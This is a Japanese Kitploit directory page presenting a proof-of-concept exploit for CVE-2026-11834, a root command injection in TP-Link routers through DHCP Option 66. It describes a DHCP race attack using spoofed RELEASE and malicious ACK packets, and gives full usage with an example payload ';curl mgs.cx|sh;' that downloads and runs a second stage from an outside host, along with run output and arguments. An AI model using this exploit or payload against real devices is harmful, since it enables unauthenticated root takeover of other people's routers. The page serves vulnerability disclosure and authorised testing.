Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-11834 — TP-Link DHCP Option 66 未認証RCE (CVE-2026-11834) の概念実証 (PoC) | Kitploit
ツール/GitHubGitHub/mattgsys/cve-2026-11834
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmattgsys/cve-2026-11834

CVE-2026-11834

TP-Link DHCP Option 66 未認証RCE (CVE-2026-11834) の概念実証 (PoC)

リポジトリを見る
3112ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-11834 (PoC)

TP-Link DHCP Option 66 の未認証RCE(CVE-2026-11834)

概要

DHCP Option 66(「TFTPサーバー名」)の処理におけるTP-Linkルーターファームウェアのコマンドインジェクションの脆弱性(CWE-78)により、同一ネットワークセグメント上の未認証の攻撃者がrootとして任意のコマンドを実行できます。デバイスがWANインターフェースでDHCPクライアントとして動作するとき、リースで返されたOption 66の値はサニタイズされずにlibcmm.so内のtftpシェルコマンドに連結されます。5つの関数がこのコマンドを構築し、system()を呼び出すutil_execSystem()に渡すため、細工されたOption 66の値はシェル入力として解釈され、rootとして実行されます。

Option 66の値はデバイス上で16文字に切り詰められるため、ペイロードは最小限のフェッチ&エグゼキュート(;curl <domain>|sh;)となり、HTTP経由でより大きなセカンドステージを取得します。

攻撃者はDHCPサーバーを制御する必要はありません。このPoCはセグメント上の正規サーバーと競合します。ターゲットになりすましてDHCP RELEASEを送信してそのバインディングをクリアし、ターゲットがリースを再取得するのを待ち、正規サーバーが応答する前に、ペイロードを含む悪意のあるOFFER/ACKでターゲットのブロードキャストに応答します。

この概念実証(PoC)は、TP-Link Archer C20 V6(ファームウェア0.9.1 Build 4.19、EU)に対してテストされました。影響を受けるコードパスは多数のTP-Linkルーターで共有されていますが、メモリオフセット、関数アドレス、および動作は、他のモデルやファームウェアバージョンでは異なる場合があります。

警告

このPoCは、ターゲットデバイス上でrootとして実行されるOption 66ペイロードを配信します。このPoCは、自分が所有しているハードウェア、または明示的にテストを許可されたハードウェアに対してのみ実行してください。

使用方法

root@kitploit:~
$ sudo python3 cve-2026-11834.py <target_ip> -i <interface> -s <dhcp_server_ip> -S <dhcp_server_mac> -p '<payload>'

実行例:

root@kitploit:~
$ sudo python3 cve-2026-11834.py 10.0.10.110 -i eth0 -s 10.0.10.254 -S 00:f2:8b:99:86:46 -p ';curl mgs.cx|sh;'

  TP-Link DHCP Option 66 Unauthenticated RCE (CVE-2026-11834) - Race Attack
  Target IP   : 10.0.10.110
  Target MAC  : 3c:64:cf:7b:69:8b
  DHCP Server : 10.0.10.254 (00:f2:8b:99:86:46)
  Attacker IP : 10.0.10.5
  Interface   : eth0
  Payload     : ;curl mgs.cx|sh;

[*] Sending spoofed DHCP RELEASE for 10.0.10.110
[*] RELEASE sent. Waiting for target to re-acquire lease...
[!] Got DHCP REQUEST from 3c:64:cf:7b:69:8b, XID: 0x43edad72
[>] Sending malicious DHCP ACK...
[>] ACK sent. Payload delivered.

ペイロードホストは、デバイスが取得して実行するセカンドステージを提供します。例:

root@kitploit:~
$ cat index.html

[second stage payload]

$ sudo python3 -m http.server 80

リンク

  • 完全なWriteup: https://mattg.systems/posts/cve-2026-11834/
  • CVEレコード: https://www.cve.org/cverecord?id=CVE-2026-11834
  • TP-Linkセキュリティアドバイザリ: https://www.tp-link.com/uk/support/faq/5141/
ツールをダウンロード
引数説明
target_ipターゲットデバイスの現在のIPアドレス
-i, --interfaceターゲットのセグメント上のネットワークインターフェース
-s, --server-ip正規のDHCPサーバーのIP
-S, --server-mac正規のDHCPサーバーのMAC
-p, --payloadOption 66の値(16文字以内)、例:`;curl
-t, --target-macターゲットのMAC(省略時はARPで自動解決)
-a, --attacker-ip悪意のあるリースでアドバタイズされるserver-id(デフォルトはインターフェースIP)